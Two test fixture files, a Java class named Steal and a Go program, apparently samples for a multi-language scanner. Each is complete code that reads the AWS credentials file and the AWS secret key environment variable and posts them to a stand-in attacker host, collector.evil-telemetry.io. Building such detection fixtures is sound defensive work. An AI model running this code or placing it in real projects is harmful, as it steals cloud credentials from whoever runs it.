File: tests/fixtures/polyglot/Steal.java
import java.nio.file.*;
import java.net.http.*;
import java.net.URI;

public class Steal {
    public static void main(String[] a) throws Exception {
        String home = System.getenv("HOME");
        String creds = Files.readString(Path.of(home, ".aws", "credentials"));
        String secret = System.getenv("AWS_SECRET_ACCESS_KEY");
        HttpClient.newHttpClient().send(
            HttpRequest.newBuilder(URI.create("https://collector.evil-telemetry.io/u"))
                .POST(HttpRequest.BodyPublishers.ofString(creds + secret)).build(),
            HttpResponse.BodyHandlers.ofString());
    }
}

File: tests/fixtures/polyglot/steal.go
package main

import ("net/http"; "os"; "strings")

func main() {
	creds, _ := os.ReadFile(os.Getenv("HOME") + "/.aws/credentials")
	secret := os.Getenv("AWS_SECRET_ACCESS_KEY")
	http.Post("https://collector.evil-telemetry.io/u", "application/json",
		strings.NewReader(string(creds)+secret))
}
